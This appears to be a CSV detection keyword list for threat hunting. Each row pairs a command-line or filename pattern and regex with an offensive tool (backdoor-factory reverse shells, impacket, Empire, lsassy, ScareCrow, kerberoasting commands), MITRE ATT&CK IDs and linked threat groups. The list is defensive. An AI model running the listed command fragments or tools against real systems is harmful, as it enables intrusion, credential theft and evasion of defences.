"* --hyperion-args *",".{0,1000}\s\-\-hyperion\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1593"
"* --hyperion-path *",".{0,1000}\s\-\-hyperion\-path\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","1594"
"* -I *.bin * -Loader dll*",".{0,1000}\s\-I\s.{0,1000}\.bin\s.{0,1000}\s\-Loader\sdll.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","1595"
"* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*",".{0,1000}\s\-i\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\sreverse_shell_tcp\s\-a\s\-u\s\.moocowwow.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE  ELF  Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1596"
"* -i havex.profile *",".{0,1000}\s\-i\shavex\.profile\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","1597"
"* -i portscan445.gnmap -o shares_found.txt*",".{0,1000}\s\-i\sportscan445\.gnmap\s\-o\sshares_found\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","1598"
"* -i snmp-ips.txt -c community.txt*",".{0,1000}\s\-i\ssnmp\-ips\.txt\s\-c\scommunity\.txt.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","1600"
"* -i -t hiphp:latest*",".{0,1000}\s\-i\s\-t\shiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","1601"
"* iamassumeroleenum.py*",".{0,1000}\siamassumeroleenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","1602"
"* iat_obfuscation.exe*",".{0,1000}\siat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","1603"
"* iax2-brute.nse*",".{0,1000}\siax2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1604"
"* iax2-version.nse*",".{0,1000}\siax2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1605"
"* icap-info.nse*",".{0,1000}\sicap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1606"
"* icebreaker.py*",".{0,1000}\sicebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","1607"
"* id_reverse-ssh.pub*",".{0,1000}\sid_reverse\-ssh\.pub.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","1610"
"* IdentifyDomainAdmins.ahk*",".{0,1000}\sIdentifyDomainAdmins\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1611"
"* IdentifyGroupMembershipActiveUser.ahk*",".{0,1000}\sIdentifyGroupMembershipActiveUser\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1612"
"* -Identity * -Set @{serviceprincipalname='*'}*",".{0,1000}\s\-Identity\s.{0,1000}\s\-Set\s\@\{serviceprincipalname\=\'.{0,1000}\'\}.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1613"
"* -Identity * -XOR @{useraccountcontrol=4194304*",".{0,1000}\s\-Identity\s.{0,1000}\s\-XOR\s\@\{useraccountcontrol\=4194304.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting we need ACL write permissions to set UserAccountControl flags for the target user. Using PowerView","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1614"
"* iec-identify.nse*",".{0,1000}\siec\-identify\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1615"
"* iis_controller.py*",".{0,1000}\siis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","1616"
"* ike-version.nse*",".{0,1000}\sike\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1617"
"* -im amass -ir *",".{0,1000}\s\-im\samass\s\-ir\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1618"
"* -im get-dns-records*",".{0,1000}\s\-im\sget\-dns\-records.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1619"
"* -im github-get-repositories*",".{0,1000}\s\-im\sgithub\-get\-repositories.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1620"
"* -im google-get-linkedIn-employees*",".{0,1000}\s\-im\sgoogle\-get\-linkedIn\-employees.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1621"
"* -im grep-through-commits*",".{0,1000}\s\-im\sgrep\-through\-commits.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1622"
"* -im massdns*",".{0,1000}\s\-im\smassdns.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1623"
"* imaohw*",".{0,1000}\simaohw.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1624"
"* imap-brute.nse*",".{0,1000}\simap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1625"
"* imap-capabilities.nse*",".{0,1000}\simap\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1626"
"* imap-log4shell.nse*",".{0,1000}\simap\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","1627"
"* imap-ntlm-info.nse*",".{0,1000}\simap\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1628"
"* impacket *",".{0,1000}\simpacket\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","1629"
"* impacket*",".{0,1000}\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1630"
"* impacket*",".{0,1000}\simpacket.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","1631"
"* impacket.*",".{0,1000}\simpacket\..{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1632"
"* impacket/*",".{0,1000}\simpacket\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1633"
"* impacketfile.py*",".{0,1000}\simpacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","1634"
"* --impersonate Administrator -shell *",".{0,1000}\s\-\-impersonate\sAdministrator\s\-shell\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1635"
"* -impersonate* -hashes*",".{0,1000}\s\-impersonate.{0,1000}\s\-hashes.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","1636"
"* Impersonate.exe *",".{0,1000}\sImpersonate\.exe\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","1637"
"* impersonate.py *",".{0,1000}\simpersonate\.py\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","1638"
"* -ImpersonateUser *",".{0,1000}\s\-ImpersonateUser\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1639"
"* ImplantSSP.exe*",".{0,1000}\sImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","1640"
"* import Exrop*",".{0,1000}\simport\sExrop.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","0","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","1641"
